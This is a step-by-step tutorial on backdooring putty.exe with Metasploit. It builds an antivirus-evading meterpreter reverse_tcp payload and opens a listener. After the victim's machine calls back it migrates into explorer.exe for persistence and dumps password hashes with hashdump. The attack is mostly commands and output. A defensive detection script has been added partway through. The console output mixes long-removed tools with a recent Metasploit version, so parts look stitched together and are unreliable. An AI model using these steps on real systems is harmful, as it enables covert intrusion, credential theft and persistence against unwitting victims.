Backdooring with Metasploit
by Oddacon T. Ripper
Metasploit is a free, open-source pen-testing tool originally created by H.D. Moore in 2003.
Coded first in Perl, the Metasploit Framework was later converted to Ruby, and then officially signed over and picked up by the security group Rapid7.
Metasploit is available for all operating systems and comes pre-installed with BackTrack Linux, which is the OS I will be using in this article.
The good folks over at Offensive Security just released BackTrack 5. So if you're new to BackTrack, I recommend downloading the ISO and booting live from a USB thumbdrive or DVD-R.
Once you have everything configured correctly, booted up, logged on, and connected to "your" Internet, we can finally set up our Metasploit attack!
To ensure we stay within the parameters of the law, I will be doing this Metasploit attack on my Windows 7 box. We're just going to do a basic attack, inserting a backdoor into an EXE file.
We could just create an EXE backdoor from scratch, but that's no fun! Instead, let's take an already existing EXE file and install the backdoor into that.
I'm going to use the program: putty.exe
Of course, you can choose whichever EXE you would like. After you have an EXE of your liking we can create the backdoor using the payload command.
First, open a terminal and type:
$ msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=1337 R | msfencode -t exe -e x86/shikata_ga_nai -c 1 -x /home/oddacon/Desktop/putty.exe -o /home/oddacon/Desktop/putty_h4x.exe
Here msfpayload is the program that will create our backdoor and windows/meterpreter/reverse_tcp is the type of payload we are using.
LHOST, obviously, is your local IP.
LPORT is the local port we are going to be listening on later.
The R means raw output, and the pipe (|) feeds that output into another command: the encoder program msfencode, which we use to hopefully bypass the victim's anti-virus.
-t exe says we are encoding a Windows binary.
-e defines the encoder to use.
The x86/shikata_ga_nai is generally best, but there are several other encoders to choose from, as I will explain later.
-c 1 defines the number of times to encode - I encoded just once.
And finally we specify the paths: -x /home/oddacon/Desktop/putty.exe is the path to where putty.exe or the EXE file you have chosen resides.
-o /home/oddacon/Desktop/putty_h4x.exe specifies the path you want the EXE with the backdoor to go.
Once you have executed that, you should see the output message:
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)
We now have our backdoor "payload" ready for the victim to use.
We can then set up Metasploit to act as our server and wait for the victim's incoming connection through the backdoor EXE we just made.
Type clear and fire up the Metasploit console:
$ msfconsole
[ASCII art banner]
=[ metasploit v6.3.46-dev ]
+ -- --=[ 2378 exploits - 1233 auxiliary - 416 post ]
+ -- --=[ 1388 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 >
Be patient, as it will take a moment to load all the exploits, payloads, and other goodies. After loading, Metasploit will tell you how many "goodies" you have in your framework and when you last updated it.
You can always update by typing: svn up and you can also view the different exploits, payloads, etc. by typing:
msf6 > show exploits
msf6 > show payloads
msf6 > show encoders
msf6 > show etc..
Since this is a manual attack, we are going to use the generic payload handler: multi/handler
So after the Metasploit console loads up, type:
msf6 > use exploit/multi/handler
Metasploit will then recognize that we are using this exploit and return:
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) >
on a new line in the console. Then we set the payload to the same one we used earlier in creating the backdoor file:
msf6 > set PAYLOAD windows/meterpreter/reverse_tcp
Metasploit should return:
PAYLOAD => windows/meterpreter/reverse_tcp
if done correctly. Next, set the LHOST to your IP (mine is 192.168.1.2):
msf6 > set LHOST 192.168.1.2
and then the local port (the same one we used to create the payload earlier):
msf6 > set LPORT 1337
Everything is now set up, but before we execute and run our server, we can type:
msf6 > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.2      yes       The listen address (an interface may be specified)
   LPORT     1337             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

View the full module info with the info, or info -d command.
This is to make sure everything is set properly before we start listening.
Then type exploit to start the server and wait for our victim to run the backdoor: putty_h4x.exe
[*] Starting the payload handler...
[*] Started reverse handler on port 1337
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.1.2:1337 -> 192.168.1.4:1134)
meterpreter>
It did not take long (since this is a simulated attack!) for our victim to run the putty_h4x.exe file.
As you can see, Metasploit opened a session from our victim: 192.168.1.4
Now that we have established a connection using the command interpreter, meterpreter, let's get to work!
First, type ps to get a list of the system's running processes. Then type: migrate [PID #]
For instance, I type migrate 2976 where 2976 is the PID number of the system's EXPLORER.EXE process.
[*] Migrating to 2976...
[*] Migration completed successfully.
Our backdoor is now within the EXPLORER.EXE process, so if the victim decides to delete putty_h4x.exe, the backdoor connection will not be broken.
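As an added example (not part of the original article), here is the detection logic a defender could run over endpoint connection telemetry for the two behaviours just shown: the call-back from the trojanised EXE to port 1337, and the same socket turning up owned by explorer.exe after the migrate step. The process baselines, port profiles and the telemetry records are constructed for this example.

```python
# Added example, not from the article: triage endpoint connection records for the
# pattern it produces (trojanised EXE dials a high port, then the socket is owned
# by explorer.exe after "migrate"). Baselines below are assumptions for the demo.
from dataclasses import dataclass
from typing import Optional

@dataclass(frozen=True)
class Conn:
    pid: int
    process: str        # image name reported by the endpoint agent
    remote_ip: str
    remote_port: int

NO_NETWORK = {"explorer.exe", "winlogon.exe", "lsass.exe"}  # never own an outbound socket
EXPECTED_PORTS = {"putty.exe": {22, 23}, "chrome.exe": {80, 443}}
COMMON_PORTS = {22, 53, 80, 443}  # fallback for binaries with no profile

def suspicious(conn: Conn) -> Optional[str]:
    """Reason this single connection looks like a reverse-shell call-back, else None."""
    name = conn.process.lower()
    dest = f"{conn.remote_ip}:{conn.remote_port}"
    if name in NO_NETWORK:
        return f"{name} (pid {conn.pid}) owns outbound socket to {dest}"
    if conn.remote_port not in EXPECTED_PORTS.get(name, COMMON_PORTS):
        return f"{name} (pid {conn.pid}) -> {dest} is not an expected port"
    return None

def triage(conns):
    """Per-connection checks, plus one remote endpoint seen under more than one
    owning process, which is what meterpreter's migrate leaves in the telemetry."""
    findings = [r for c in conns if (r := suspicious(c))]
    owners = {}
    for c in conns:
        owners.setdefault((c.remote_ip, c.remote_port), set()).add(c.process.lower())
    for (ip, port), procs in owners.items():
        if len(procs) > 1:
            findings.append(f"{ip}:{port} owned by {sorted(procs)}: possible process migration")
    return findings

# Constructed telemetry mirroring the article's session (victim 192.168.1.4 -> 192.168.1.2:1337).
SAMPLE = [
    Conn(1204, "putty.exe", "192.168.1.50", 22),       # legitimate SSH, not flagged
    Conn(3312, "putty_h4x.exe", "192.168.1.2", 1337),  # stager call-back
    Conn(2976, "explorer.exe", "192.168.1.2", 1337),   # same socket after "migrate 2976"
    Conn(4100, "chrome.exe", "93.184.216.34", 443),    # normal browsing, not flagged
]

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```

Running it on the sample prints three findings: the unknown binary dialing 1337, explorer.exe owning an outbound socket, and the 192.168.1.2:1337 endpoint having changed owner.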
From here, we can do a number of things.
For instance, the command getuid will return the current user the victim is running on.
The command getsystem attempts to elevate your privileges.
Typing hashdump will display the contents of the SAM database.
There are still a number of other commands we can use, such as downloading and uploading files, recording keystrokes and other information, and even shutting down the system.
For more info on meterpreter commands just type ? or help for the help menu.
And check out offensive-security.com/metasploit-unleashed for more information on the Metasploit Framework.